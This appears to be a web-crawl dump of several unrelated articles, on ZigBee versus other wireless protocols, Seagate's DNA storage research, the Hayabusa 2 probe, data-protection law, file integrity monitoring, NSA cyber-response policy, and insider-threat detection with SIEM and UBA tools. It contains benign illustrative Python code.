- ZigBee 2007 — Publicly released in October 2008, it contains two different profile classes.
- ZigBee PRO — One of the profile classes of ZigBee 2007, it provides additional features for robust deployments including enhanced security.
- RF4CE — denoting ‘Radio Frequency for Consumer Electronics,’ this standard applies to audio visual uses. Adopted by the ZigBee Alliance, Version 1.0 was released in 2009.
Here’s a basic video overview of ZigBee from Russian technical consultant Anton “Chip and Dip” Pankratov:
Comparing ZigBee with Other WPAN Protocols
No doubt the reader is aware that there are a number of WPAN and M2M protocols currently in use. Each has distinct advantages and disadvantages; all are in widespread use.
The Infrared Data Association (IrDA) is the international body responsible for governing standards for interoperable, low-cost data infrared (IR) wireless connections. Providing bidirectional line-of-sight high speed connections at short range for point-to-point wireless data transfers, IR wireless “point and shoot” devices are in widespread use across the world. Most people have at least one in their home and/or office. These include peripherals such as TV remotes, wireless computer “mouses” (your intrepid author revels in this usage; “mice” or “mouse devices” is also acceptable), printers, modems and headsets.
As popular as IR is, these devices suffer from limitations. Line-of-sight is required, as mentioned, and the devices must generally be no more than two meters apart. Too, IR waves cannot pass through walls like Wi-Fi can. On the other hand, IR is much more secure, with security comparable to that of hard-wired systems, and has a very low bit error rate (BER). IR ports cost very little to incorporate into a device. Reportedly, data transmission rates max out at 4 Mbps, much higher than that available with ZigBee.
ZigBee ‘Remote Control’ (i.e., RF4CE) is designed to replace venerable IrDA standards. Its advantages include bidirectional high speed communication ability, faster response times, increased energy efficiency and no line-of-sight restrictions. RF4CE can be found on many consumer electronic devices including HD and UHD TVs, home theater gear and audio equipment. Manufacturers incorporating RF4CE are Samsung, Philips, Sony, Panasonic and many others.
The latest version of ZigBee Remote Control (RF4CE 2.0), released in 2014, is backward-compatible with the previous version.
Without a doubt, Bluetooth Low Energy (BLE) is ZigBee’s most serious rival for WPAN dominance. Like ZigBee, BLE does not require line-of-sight between devices and can transmit through walls and around barriers. Notably, BLE can transmit data over greater distances than ZigBee: up to 100 meters (328 feet) with amplification, where ZigBee is limited to a range of 70 meters (230 feet). While both operate on the same frequency band, Bluetooth splits and exchanges data packets across 1 MHz bandwidth channels (79 are available) using a modulation technique known as Frequency Hopping Spread Spectrum (FHSS). ZigBee does not split packets, using Direct Sequence Spread Spectrum (DSSS) instead.
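The FHSS-versus-DSSS distinction can be illustrated in a few lines of Python. The hop schedule and chip pattern below are toy stand-ins (real Bluetooth uses a defined pseudo-random hop sequence over its 79 channels, and ZigBee maps symbols to standardized chip sequences), but they show the structural difference: FHSS changes the carrier channel every time slot, while DSSS stays on one channel and expands each data bit into a longer chip stream.

```python
import random

BLUETOOTH_CHANNELS = 79  # 1 MHz channels in the 2.4 GHz band

def fhss_hops(n_slots, seed=7):
    """Toy FHSS: pick a pseudo-random channel for each time slot."""
    rng = random.Random(seed)
    return [rng.randrange(BLUETOOTH_CHANNELS) for _ in range(n_slots)]

def dsss_spread(bits, chips_per_bit=8, seed=7):
    """Toy DSSS: XOR each data bit against a fixed chip sequence,
    expanding one bit into `chips_per_bit` chips on a fixed channel."""
    rng = random.Random(seed)
    chip_seq = [rng.randrange(2) for _ in range(chips_per_bit)]
    return [bit ^ chip for bit in bits for chip in chip_seq]

print("FHSS channel per slot:", fhss_hops(6))
spread = dsss_spread([1, 0, 1])
print(f"DSSS: 3 data bits -> {len(spread)} chips")
```

The spreading is what lets a DSSS receiver correlate the known chip pattern against noise to recover the data, while FHSS copes with interference by simply not lingering on any one congested channel.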
According to Link Labs, “these Personal Area Network (PAN) wireless standards have more differences than similarities.” A summary of other differences is presented below:
| | Bluetooth (BLE) | ZigBee |
|---|---|---|
| Protocol stack size | 250K bytes | 28K bytes |
| Battery | Meant for frequent recharging | Not rechargeable |
| Maximum network speed | 1 Mbps | 250 Kbps |
| Network range | Up to 100 meters (328 feet) | 70 meters (230 feet) |
| Typical network join time | 3 seconds | 30 milliseconds |
Z-Wave, another WPAN standard in use but not nearly as widely heralded, is a proprietary (not open source) technology with key similarities to and differences from ZigBee. Both are mesh networks and both have similar applications in security systems, home automation, environmental controls, etc.
Where they differ:
- ZigBee utilizes the 2.4 GHz frequency band, meaning it can be used worldwide. This band is notorious for interference and congestion as it is shared with Wi-Fi and Bluetooth. Z-Wave connects on sub-GHz bands — 915 MHz in the U.S. and 868 MHz in Europe.
- As mentioned earlier, ZigBee uses DSSS. Z-Wave uses Frequency Shift Keyed (FSK) modulation. For more info on FSK, see here.
- Z-Wave range is reported to be limited to 30 meters (98.5 feet); ZigBee tops out at 70 meters.
While the ZigBee Alliance claims “reliable” and “seamless” interoperability, competitors and industry observers beg to differ. For example, electronic engineer and blogger Dr. Walter Colitti writes that “the lack of interoperability in ZigBee is due to two main reasons: the lack of an open protocol stack and the lack of a proper certification program.” Link Labs, proprietor of a competing product called Symphony Link, notes that “two ZigBee profiles can interfere with one another.” A separate blog entry adds, “ZigBee’s prime drawback is its inability to communicate easily with other IP protocols.”
But the lack of a dominant standard for WPANs, HANs, etc., is not the foremost concern facing equipment manufacturers at the moment. As key elements of the Internet of Things (IoT), smart appliances must first be secured against hackers and botnets. Otherwise, the world will see repeats of the widely reported distributed denial of service (DDoS) attacks against dynamic DNS provider Dyn on 21 October 2016.
Seagate is bringing its lab-on-a-chip technology to Catalog’s DNA storage technology to enable faster and much, much smaller devices to read data stored in DNA. What is a lab-on-a-chip, and why is Seagate involved with this concept?
A laboratory on a chip is a device for carrying out chemical reactions, using minute amounts of fluids, and registering the results. Lab-on-a-chip devices have been developed by researchers pursuing cost-effective and rapid diagnostic testing of patients. These chips handle all the steps from sample-in to result-out at the point of care, such as the doctor’s office or patient’s home, rather than in a hospital’s diagnostic laboratory. They can detect protein markers to diagnose cardiac diseases and nucleic acid markers to look for infectious diseases. The COVID rapid lateral flow test kit can be seen as a very simple, chip-sized lab device: a single-use, single-function unit for checking the presence of the COVID virus antigen in a fluid sample.
Chip-based labs are functionally specific and can use microfluidic technology to move droplets through the device as a way of pre-treating a sample before it is tested. The pre-treatment may purify or amplify the biomarkers whose presence is being tested.
Catalog’s current Shannon technology has demonstrated writing and reading data using DNA storage technology but the equipment needs to be housed in a room, which Catalog says is the size of a small kitchen. Seagate says the results of its joint research with Catalog are expected to reduce Shannon’s size by a factor of 1,000 and also increase the automation and scalability of Catalog’s platform.
It is not obvious why Seagate is involved in this technology. Its primary focus is manufacturing hard disk drives – nothing to do with making or using chemical laboratories on a chip. It has been involved in fluidics through the use of fluid bearings for disk drive motors. A viscous oil is used instead of metal ball bearings to support the drive shaft. Fluid dynamic bearing motors have no metal-to-metal contact and are quieter than ball-bearing motors, withstand greater shock, and have a theoretically infinite life.
But this use of a particular viscous fluid is a long way away from DNA-based lab-on-a-chip work.
A Catalog blog talks about desktop and IoT-size devices and states: “The collaboration will center on using Seagate’s ‘lab on a chip’ technology to reduce the volume of chemistry required for DNA-based storage and computation. Using the Seagate platform, tiny droplets of synthetic DNA can test chemistry at significantly smaller levels. These droplets will be processed through dozens of reservoirs on the Seagate platform. DNA from individual reservoirs is mixed to produce chemical reactions for a range of computing functions, including search and analytics, machine learning, and process optimization.”
This appears to be focussed on computation more than storage and is not a near-term research effort.
Hyunjun Park, founding Catalog CEO, said in a canned quote: “This work with Seagate is essential to eventually lowering costs and reducing the complexity of storage systems.”
Seagate DNA storage background
In December 2021, nine months ago, Seagate wanted to recruit a research engineer for lab-on-a-chip work. The job spec requirements document said “This position offers a variety of opportunities to prototype, experiment and benchmark new ideas and concepts in lab-on-a-chip domain.”
“The engineer will be involved in exciting projects in lab-on-a-chip involving designing experiments to proofs-of-concept. The successful candidate will also work with the global team of Seagate researchers in designing and fabricating microfluidic devices, evaluating systems, as well as analyzing and documenting the results for internal as well external reports and presentations.”
Candidates should have “Theoretical and practical knowledge of DNA amplification techniques (PCR, LAMP, rolling circle amplification, etc.). ”
It is obvious that Seagate Research was looking at DNA storage then. In fact, it had been looking into DNA storage for some time before that.
Seagate patents for DNA storage and microfluidics
Seagate has been engaged in research engineering into DNA storage and microfluidics for two and a half years and has contributed to four patents that we know of. For example, Ed Gage, Seagate VP for Research, is a contributor to a patent application involving microfluidics:
- Microwave Heating Device for Lab On A Chip – Publication number: 20220048032
- Filed: August 9, 2021
- Publication date: February 17, 2022
- Inventors: Tim Rausch, Edward Charles Gage, Walter R. Eppler, Gemma Mendonsa.
Tim Rausch, now at AWS, was at Seagate between May 2003 and November 2020. Edward Charles Gage is Seagate VP for research. Walter Eppler is a technologist at Seagate Technology. Gemma Mendonsa is a biomedical engineer at Seagate.
Eppler and Mendonsa filed a patent for Methods and Systems for Reading DNA Storage Genes in August 2020.
Rausch, Eppler and Mendonsa filed a patent for Microfluidic Lab-on-a-Chip for Gene Synthesis in April 2020. The abstract states: “A microfluidic lab-on-a-chip system for DNA gene assembly that utilizes a DNA symbol library and a DNA linker library. The lab-on-a-chip has a fluidic platform with a plurality of arrays operably connected to a voltage source and a controller for the voltage source …”
Text in this application reads: “DNA is an emerging technology for data storage. Current methods assert that a DNA strand or gene, to store 5KB of data, can be written in 14 days. Comparatively, magnetic disk drives and magnetic tapes both can write 1 TByte in about an hour. A single DNA base pair location can store 2 bits; thus, 4000 Giga-base pairs would need to be stored in an hour to match the capabilities of a single disk drive or tape. Although current technology is believed to be capable of writing 15 base pairs an hour, there needs to be an 8 to 9 order of magnitude improvement in order for DNA data storage to be viable.” The application includes a “method of synthesizing a DNA gene on a lab-on-a-chip” which can speed up DNA storage writing.
The three researchers filed a second application in this area in the same month: Methods of Gene Assembly and their use in DNA Data Storage.
We have asked Seagate for a briefing to explain how and why it became involved in DNA data storage.
Our investigations turned up Gareth McClean, a process engineer – electroplating – at Seagate Technology in Derry, Northern Ireland, whose listed specialities include fluorescence-based immunoassay detection systems for the point-of-care market in the field of medical diagnostics, as well as microfluidic-based diagnostic devices for the same market. This is possibly a coincidence.
In December 2021 Chinese DNA storage researchers announced they had developed a SlipChip – a microfluidic device to hold the DNA chemicals and the various reagents. A single SlipChip can act as an electrode, with its electrical charge altered by the presence or absence of DNA sequences.
The SlipChip can be classified, we think, as a lab-on-a-chip. | <urn:uuid:d6ea9bba-5ea5-41c7-a3ee-34cf9fba68ab> | CC-MAIN-2022-40 | https://blocksandfiles.com/2022/09/19/seagate-dna-storage-involvement/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00315.warc.gz | en | 0.94181 | 1,597 | 3.421875 | 3 |
TOKYO (Reuters) – A Japanese space probe named after a falcon arrived at an asteroid 300 million kilometers from Earth on Wednesday after a three-and-a-half-year journey on a mission to seek the origins of life.
The Hayabusa 2 blasted off in December 2014 for the asteroid Ryugu on a pioneering mission to take samples that scientists hope will help reveal how life began. Its round-trip mission is set to take six years.
“Everything has gone as planned,” a spokesman for the Japan Aerospace Exploration Agency (JAXA) told a news conference. “The probe has arrived at the asteroid”.
Hayabusa 2, named for the peregrine falcon, will spend the next few months orbiting about 20 km above the asteroid and mapping its surface before landing. It will then use small explosives to blast a crater on the surface and collect the resulting debris.
Asteroids are believed to have formed at the dawn of the solar system and scientists say Ryugu may contain organic matter that may have contributed to life on Earth.
Television footage showed the control room erupting in applause as the probe’s safe arrival was confirmed, with some researchers standing and grinning as they shook hands.
“We’re mostly relieved, but now there’s tension as to whether the main mission will go well,” one official said.
Should all go according to plan, Hayabusa 2 is expected to spend around 18 months near the asteroid and return to Earth with samples at the end of 2020, the year Tokyo hosts the Summer Olympic Games.
The first Hayabusa probe was unable to collect as much material as hoped but still made history by being the first probe to bring back samples from a different asteroid.
Its seven-year mission ended in 2010 when it blazed a trail over Australia before slamming into the desert.
Success with Hayabusa 2 would help Japan’s space program move beyond a chequered past that included a 2016 accident in which the first of three planned military communication satellites was crushed during a flight from Japan to Europe’s space port in French Guiana.
The first such satellite eventually blasted successfully into space in January 2017.
(Reporting by Elaine Lies; Editing by Darren Schuettler) | <urn:uuid:4f3ca00a-9231-475c-b4f1-0b9cc3325624> | CC-MAIN-2022-40 | https://disruptive.asia/japanese-hayabusa-asteroid/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00315.warc.gz | en | 0.952162 | 474 | 2.953125 | 3 |
The United States was once the leader in creating rules curtailing fraud on stock exchanges. One of its most famous rules, Rule 10b-5, codified at 17 CFR 240.10b-5, was created in the 1940s and prohibits acts or omissions resulting in fraud or deceit in connection with securities trading.
Like many laws, it was imitated on a global scale, but it took almost 60 years before it was adopted in such trusted exchanges as Hong Kong and Tokyo. Nowadays things move a bit faster.
The European Union’s GDPR (General Data Protection Regulation) became law on May 25, 2018. Today, less than 4 years later, there are similar laws in more than 20 countries.
The reason is simple. Article 44 of the Regulation states that if a third country wants to use EU residents’ personal data, it must protect their rights. To do this, its data protection laws have to be “adequate.” Most countries quickly figured out that to be “adequate,” they should pass a law that looks a lot like the GDPR. The exception is the U.S.
Global regulation of personal data processing has not stopped with the GDPR. In the EU and the U.S., legislatures are busy passing new laws that regulate how organizations process information, and regulators are busy enforcing them.
The European Commission has passed, is close to passing, or is considering several laws as part of its digital strategy. These include the Data Governance Act, the Digital Markets Act, the Digital Services Act, the AI (Artificial Intelligence) Act, the Data Act, and the ever-popular ePrivacy Regulation.
Fortunately, the biggest impact of these laws will be limited to the largest tech companies, including Google, Microsoft, Facebook (Meta), Apple, and Amazon. In terms of regulating these organizations, the U.S. is not far behind, although without a strategy.
Data governance and digital markets
The following is a simplification of the complex laws. The Data Governance Act is about the sharing of information. It seems to be focused on public information, most likely from EU national health services. No doubt the Act will result in more anonymization of data.
The Digital Markets Act is focused on “gatekeepers” (U.S. big tech), treating the regulation of big tech almost as an antitrust problem. Little is known about the Data Act or the AI Act because there are no concrete proposals at this time. For most of us, the Digital Services Act is probably the most interesting, since it has analogs in the U.S. Congress.
The Digital Services Act focuses on one of the largest problems for social media: algorithms – specifically, their impact. The Act aims to stop the largest platforms from publishing and spreading illegal or potentially harmful content such as copyright infringements, terrorist content, child sexual abuse material, or hate speech, as well as selling counterfeit, illegal, or dangerous products.
Under section 230 of the Communications Decency Act of 1996 (47 U.S. Code § 230), large Internet platforms are not liable for speech published on their platforms.
Unlike other media outlets such as newspapers and television, companies like Google and Facebook cannot be sued if the content on their platforms causes harm. This has become a major issue, especially in light of recent evidence that social media apps like TikTok have caused harm to teenage users. The platforms have also been used to organize criminal activities.
The Filter Bubble Transparency Act
Given the problems with section 230, it is not surprising that there have been numerous efforts to either delete the provision or reform it. One of the latest efforts is the Filter Bubble Transparency Act. Focused on algorithms, it allows Internet users to choose between the platform algorithms and an algorithm developed with the user’s input.
The largest impact of the Digital Services Act in the EU and the Filter Bubble Transparency Act in the U.S. would be more transparent algorithms. Both laws reflect governmental preferences.
In the EU, regulators will determine whether an algorithm promotes illegal content. In the U.S., users will determine what they want to see. Neither act has cleared all the hurdles to becoming law, although the Digital Services Act is closer.
The Filter Bubble Transparency Act has been introduced in both chambers of U.S. Congress. It has a long list of cosponsors and is bipartisan. The latest polls show that the majority of Americans (56% and rising) are in favor of government regulation of big tech.
It is not just legislative efforts. While the EU attempts to limit the power of “gatekeepers” with the Digital Markets Act, U.S. regulators have turned to the courts. Most complaints are based on big tech’s anti-competitive behavior. The Federal Trade Commission is suing Facebook and Amazon. The U.S. Justice Department is suing Apple and Google.
Finally, 38 states have joined forces to sue Google. These lawsuits deal with the way these companies compete in app stores, in marketplaces, on the Internet of Things, and online. Like the Digital Markets Act, these lawsuits will force big tech to change their behavior or be broken up.
What effect do these laws have?
Fortunately, for most companies these laws will have little impact. The Digital Markets Act and the Digital Services Act only apply to platforms that have active users equal to 10% of the EU population (about 45 million people). The Data Governance Act is mainly interested in access to public information.
This does not mean that companies that process personal data (basically all companies) should be complacent. It always takes the law time to catch up with major changes in technology. When it does, it can regulate with a vengeance everywhere. The jurisdiction of these laws is limited for now. Do not expect that to continue.
Furthermore, not being big enough to be subject to regulation does not mean that an organization is small enough to avoid cyber criminals. The best tactic, whatever your size, is to create good cybersecurity that protects your customers’ information.
At IT Governance USA, we can help you do this. We are a one-stop shop for your cybersecurity and data protection needs, offering a variety of tools you can use to bolster your defences and maintain regulatory compliance.
Subscribe to our Weekly Round-up to get the latest cybersecurity news and tips delivered straight to your inbox. | <urn:uuid:7018735d-7c9b-4178-ad45-b000784855df> | CC-MAIN-2022-40 | https://www.itgovernanceusa.com/blog/understanding-the-u-s-s-data-service-laws | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00315.warc.gz | en | 0.953587 | 1,303 | 2.78125 | 3 |
What is File Integrity Monitoring (FIM)?
The term FIM refers to IT security technologies and processes used to check whether certain components were corrupted or tampered with. You can use FIM to inspect operating systems (OS), databases, and application software files.
A FIM solution establishes a trusted, known baseline for each file and audits all changes to files by comparing them to this baseline. If it determines that a file has been tampered with, updated, or corrupted, it generates an alert to enable further investigation and action.
You can use FIM in two ways:
- Active monitoring—live monitoring of changes to files based on rules or behavioral analysis
- Reactive auditing—forensic examination of files after security incidents
How File Security Enables File Integrity Monitoring
File Integrity Monitoring solutions rely on file security features built into modern operating systems and databases.
Windows file security
In Windows, files are securable objects. Access is managed by the same access control model that manages all other securable Windows objects.
Windows compares the information in the thread’s access token, together with the access rights requested, against the information in the file or directory’s security descriptor. If the requested access is allowed, a handle is returned to the thread and access is granted.
Linux file security
The Linux security model is based on the robust security model used by UNIX systems. In Linux, there are three categories of users: owner, group, and other users. The owner can grant or deny read, write, and execute permissions for each user category.
Linux represents each permission as an octal value, which is summed per user category to form that category’s permission digit:

- 0—no access granted to the user category
- 4—read access granted to the user category
- 2—write access granted to the user category
- 1—execute permission granted to the user category

For example, a digit of 6 (4 + 2) grants read and write access, and 7 grants read, write, and execute.
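As an illustration, these per-category values can be read programmatically. The following Python sketch (purely illustrative, not part of any particular FIM product) decodes a file’s permission bits into the read (4), write (2), and execute (1) values for each user category:

```python
import os
import stat

def permission_summary(path):
    """Decode a file's mode bits into per-category permission digits."""
    perms = stat.S_IMODE(os.stat(path).st_mode)   # e.g. 0o644
    names = ((4, "read"), (2, "write"), (1, "execute"))
    summary = {}
    for category, shift in (("owner", 6), ("group", 3), ("other", 0)):
        digit = (perms >> shift) & 0o7            # sum of the 4/2/1 values
        summary[category] = (digit, [n for v, n in names if digit & v])
    return summary
```

For example, a file with mode 0o640 would report `(6, ['read', 'write'])` for the owner, `(4, ['read'])` for the group, and `(0, [])` for other users.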
Database file security
All modern databases have built-in file security features. For example, an Oracle database has the same user categories as Linux—owner, group, and other users. Only the owner of the file or root can assign or modify file permissions. Permissions include read, write, execute, and denied—meaning users do not have any access to the file.
Why is File Integrity Monitoring Important?
File integrity monitoring software tracks, analyzes, and reports about unexpected changes to critical files in your IT environment. It can support incident response while providing an important layer of file security for data stores and applications. The four main use cases for monitoring file integrity are:
- Detecting malicious activity—when security breaches occur, it is important to know whether they have attempted to modify important files in operating systems or applications on your IT systems. Even if log files and other detection systems are bypassed or changed, FIM can detect changes to key parts of the IT ecosystem.
- Identifying accidental changes—it is quite common for an employee or other authorized party to accidentally modify or delete a file. In some cases, a change can hurt the stability of a system, create a security backdoor, or result in loss or corruption of sensitive data. Monitoring file integrity simplifies forensic investigations by showing what happened, where, and by whom.
- Verifying updates and system integrity—IT systems are often updated. You can use FIM solutions to run scans on multiple systems that had the same patch applied, to ensure that they are all updated correctly, by comparing their file checksums. Similarly, you can scan multiple systems running the same OS or software to ensure they are all running a consistent version of it.
- Compliance—standards like SOX, HIPAA, and PCI DSS mandate that organizations monitor and report on changes to files. See the regulations that require FIM in the section below.
How File Integrity Monitoring Software Works
File integrity monitoring solutions typically have four key components:
- Database—stores information about the original state and settings of files in an encrypted hash format
- Agents—deployed on the computers FIM needs to monitor; they collect data from hardware and applications and store it in the database
- Analysis engine—analyzes file data to identify important changes, based on static rules and/or behavioral analysis driven by machine learning algorithms
- User interface—enables FIM administrators to access reports, actively search for file changes, and configure alerts
5 Steps to Implementing a File Integrity Monitoring Solution
You can follow the process below to prepare your organization for a FIM solution, and implement it effectively.
1. Defining a policy
A FIM strategy begins with policies. In this step, the company determines which files it needs to monitor, what kinds of changes can have an impact, and who should be notified and take action.
2. Setting baselines for files
Based on the policies, a FIM solution scans the relevant files across the organization and sets a baseline of “known good” files. Some compliance standards require this baseline to be documented in a way that can be presented to an auditor.
The baseline typically includes the version, creation/modification date, a checksum, and other information that IT experts can use to verify that the file is valid.
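As a minimal illustration of this step (a real FIM product stores the baseline in a protected, often encrypted database, and the choice of SHA-256 here is an assumption), the following Python sketch walks a directory tree and records a checksum, size, and modification time for each file:

```python
import hashlib
import os

def build_baseline(root):
    """Snapshot every file under root as a 'known good' baseline."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            # Read and hash the whole file; a production tool would
            # hash in chunks to handle large files.
            with open(path, "rb") as f:
                digest = hashlib.sha256(f.read()).hexdigest()
            baseline[os.path.relpath(path, root)] = {
                "sha256": digest,
                "size": st.st_size,
                "mtime": st.st_mtime,
            }
    return baseline
```

The resulting dictionary can be serialized and stored securely so that later scans have a documented baseline to compare against.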
3. Monitoring files for changes

Once the baseline is recorded across all relevant files, FIM can continuously monitor all files for changes. Because files are often changed legitimately, FIM can generate a large number of false positives—alerting about a change to a file even though it is not malicious or impactful.
A FIM system can use several strategies to avoid false positives. Administrators can define (in advance or after receiving a false positive alert) rules indicating which types of changes are expected or allowed. A FIM system can also use behavioral analysis to determine if the change is “normal” or constitutes an “anomaly” that needs to be investigated.
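To make the comparison step concrete, here is a hedged sketch assuming each snapshot (the baseline and a fresh scan) maps file paths to a record containing the file’s checksum; the static `allowed_prefixes` rule stands in for the administrator-defined rules that suppress expected changes:

```python
def detect_changes(baseline, current, allowed_prefixes=()):
    """Compare a fresh scan against the baseline and classify deviations.

    Both arguments map relative file paths to records that include a
    "sha256" checksum. Paths matching allowed_prefixes are expected to
    change, so they never raise an alert (reducing false positives).
    """
    def suppressed(path):
        return any(path.startswith(prefix) for prefix in allowed_prefixes)

    return {
        "added": sorted(p for p in current
                        if p not in baseline and not suppressed(p)),
        "removed": sorted(p for p in baseline
                          if p not in current and not suppressed(p)),
        "modified": sorted(p for p in current
                           if p in baseline
                           and current[p]["sha256"] != baseline[p]["sha256"]
                           and not suppressed(p)),
    }
```

Anything in the returned dictionary would be handed to the alerting step; a behavioral-analysis engine would replace the static prefix rule with a learned model of “normal” change.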
4. Sending alerts
When a file integrity monitoring solution detects significant, unauthorized changes, a file security alert should be sent to the teams or individuals who are responsible for that data or system, and are responsible for investigating the problem. FIMs may send alerts to IT staff, database or file server administrators, or security teams.
5. Reporting results
A FIM generates periodic reports showing file activity and changes in the organization. These reports might be used internally by security or IT staff, or they can be delivered to auditors for compliance purposes (see the following section).
Compliance Standards that Require File Integrity Checks
FIM solutions are commonly used to comply with regulations or compliance standards. Below are the requirements of several common compliance standards with regard to file security.
The Payment Card Industry Data Security Standard (PCI DSS) regulates the security activities of organizations involved in processing payment cards. There are two parts of the PCI standard that specifically describe the requirements for file integrity monitoring:
- 10.5.5—use file integrity monitoring or change detection software to ensure any change to log data triggers an alert
- 11.5—implement change detection monitoring to compare critical system, content or configuration files, and generate alerts about any unauthorized changes.
The Sarbanes-Oxley Act (SOX) is a federal law that establishes accountability requirements for the boards of directors of US publicly traded companies, their management, and their accounting firms.
SOX does not specify the specific methods an organization should use to meet its requirements. Most organizations rely on the COBIT framework for regulatory compliance. COBIT has 34 control objectives organized into four groups. Here are the groups and specific objectives relevant for file integrity monitoring:
“Build, Acquire and Implement (BAI)
- BAI06—Manage Changes
- BAI09—Manage Assets
- BAI10—Manage Configuration
Deliver, Service and Support (DSS)
- DSS03—Manage Problems
- DSS04—Manage Continuity
- DSS06—Manage Business Process Controls
Monitor, Evaluate and Assess (MEA)
- MEA01—Monitor, Evaluate and Assess Performance and Conformance
- MEA02—Monitor, Evaluate and Assess Internal Control”
The General Data Protection Regulation (GDPR) applies to all companies that process personal data of EU data subjects. You can use FIM to meet the following GDPR requirements:
- Article 25—data protection by design and data protection by default
- Article 32—security for data processing
- Article 39—duties of the Data Protection Officer (DPO)
- Article 57—tasks performed by supervisory authority (including audits and complaints)
- Article 59—activity reports
The Health Insurance Portability and Accountability Act of 1996 (HIPAA) includes safeguards to ensure the integrity, availability, and confidentiality of protected medical information.
The HIPAA Security Rule defines five technical safeguards that may be related to file security: access control, audit controls, integrity, person or entity authentication, and transmission security.
In addition, according to NIST Special Publication 800-66, a FIM solution can help achieve the requirement for “continuous evaluation of access controls and data security”, which is specified in HIPAA best practices.
File Security with Imperva
Organizations that leverage file integrity monitoring to protect their sensitive data are in need of a holistic security solution. Even with FIM technology in place, infrastructure and data sources like databases need to be protected from increasingly sophisticated attacks.
Imperva protects data stores to ensure compliance and preserve the agility and cost benefits you get from your cloud investments:
Cloud Data Security – Simplify securing your cloud databases to catch up and keep up with DevOps. Imperva’s solution enables cloud-managed services users to rapidly gain visibility and control of cloud data.
Database Security – Imperva delivers analytics, protection and response across your data assets, on-premise and in the cloud – giving you the risk visibility to prevent data breaches and avoid compliance incidents. Integrate with any database to gain instant visibility, implement universal policies, and speed time to value.
Data Risk Analysis – Automate the detection of non-compliant, risky, or malicious data access behavior across all of your databases enterprise-wide to accelerate remediation. | <urn:uuid:75478cfc-0de9-4a5c-9610-996b4b3a5630> | CC-MAIN-2022-40 | https://www.imperva.com/learn/application-security/file-security-integrity-monitoring/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00515.warc.gz | en | 0.893846 | 2,115 | 3.015625 | 3 |
The US is considering responding to hackers through the use of conventional weapons, according to the director of the National Security Agency (NSA).
Michael Rogers, who also heads US Cyber Command, told a forum in Washington DC that the American military was contemplating several options as it prepares for the rising risks of cyber.
Speaking at George Washington University, he said: "Because an opponent comes at us in the cyber-domain doesn’t mean we have to respond in the cyber domain.
"We think it’s important that potential adversaries out there know that this is part of our strategy."
Following last year’s attack on Sony Pictures Entertainment, the film subsidiary of the Japanese electronics conglomerate, the US arranged economic sanctions against North Korea, which it blamed for the hack.
According to the newswire Agence France-Presse, Rogers cited this as an example of a non-cyber response to a cyber-attack, and did not rule out physical weapons as another tool that could be used.
"It’s situational dependent," he said. "What you would recommend in one scenario is not what you would recommend in another."
Tensions between the US and its global rivals Russia and China have increased over the past few years, with both the latter countries accused of funding cyberattacks against Western companies and citizens.
The low cost of entry for cyber-weapons has also meant that poor countries like North Korea can fight on more equal terms with superpowers, whilst the difficulty of attributing attacks makes military deterrence more complicated.
Despite its complaints, the US is widely believed to have developed the most potent cyber-weapon in history in the form of Stuxnet, a virus that attacked Iranian nuclear infrastructure over several years.
Hackers come in many forms. They could be a single person acting alone or an organised group of individuals with nefarious intent. With so many possible origin points and numerous varieties of attacks it can be very difficult to prevent them all, let alone figure out where they are coming from and who is perpetrating them.
Owing to how complicated investigating and solving these incidents can be, it is sometimes easier to focus on the attack itself and defend against it rather than try to trace where every single attack came from. This might work in the short term, but in the longer term this approach does not guarantee that the attacker will not be back again. To make matters worse, the attacker might be closer than you realise.
Insider threats are a recurring problem for enterprise security as those with malicious intent are given direct access to the network infrastructure. Often, an insider threat is a disgruntled employee or ex-employee who still has access to your systems, or they could be a spy working for a third party to steal confidential and sensitive information.
The most dangerous insider threats are the employees who are not even aware they are the cause of the problem. Due to ignorance or carelessness, the accidental threat looms large whereby employees may have allowed harmful malware onto the system unintentionally. It is a very complicated process to identify an insider threat, and this has led to some businesses adopting a ‘zero trust’ policy. This is a model based on the principle of maintaining strict access controls and not trusting anyone by default, especially individuals already inside the network perimeter.
There is technology designed to help fight against insider threats and the most commonly used are aptly called Security Information and Event Management (SIEM) tools. SIEM tracks and collects system events captured in firewalls, workstations, network appliances and more, it then collates them all into one database for easy viewing. This data can then be analysed for any anomalous events captured and an alert sent to the security team, allowing them to take instant action to remedy the situation.
With a growing number of devices connected to the enterprise network, the number of records the SIEM tool must monitor and analyse is growing. To solve this problem, the device administrator creates a profile of the system during peacetime. The SIEM is then pre-configured with rules that help to identify when something unusual has happened and when to trigger an alert. That way, only what is seen as unusual gets flagged and normal traffic is ignored. For general cyber security this works well, and this is the reason why SIEM tools are so widely adopted. However, when pinpointing the origin of an insider threat, the information is simply too broad.
SIEM can track anomalies across an entire network and flag up dangerous events to the security teams, however it is always reactionary and cannot supply intelligence around the individuals who may have caused the event. This data is vital for countering insider threats as the key to defending against it is identifying the individuals involved. SIEM tools by themselves cannot stop insider threats, but there are tools that can support SIEMs to improve on this, these are called User Behaviour Analytics (UBA) tools.
UBA tools function in a very similar way to SIEMs. A baseline is laid out identifying what is normal and what is abnormal and then the UBA scans for events that fall into the latter category. The difference is that, as the name implies, UBA looks at the actions of individual users in the internal enterprise network as opposed to the whole infrastructure. The UBA can quickly identify user deviations from what is considered the norm and generate an alert. Utilising this method, the source of the attack can be identified instead of just the attack itself, helping develop a definite solution to stop the root cause.
UBA can spot changes in the activity of employees that signal insider data theft or IT sabotage. It can also tell whether an employee’s credentials are being used by outsiders by identifying whether the access is coming from within the internal network or from the outside. UBA gives a greater level of visibility and intelligence that SIEMs cannot provide on their own. It provides organisations with multiple ways in which statistics can be analysed and offers both numerical and categorical data. This allows security professionals to prevent insider attacks before they happen, making UBA proactive instead of responsive.
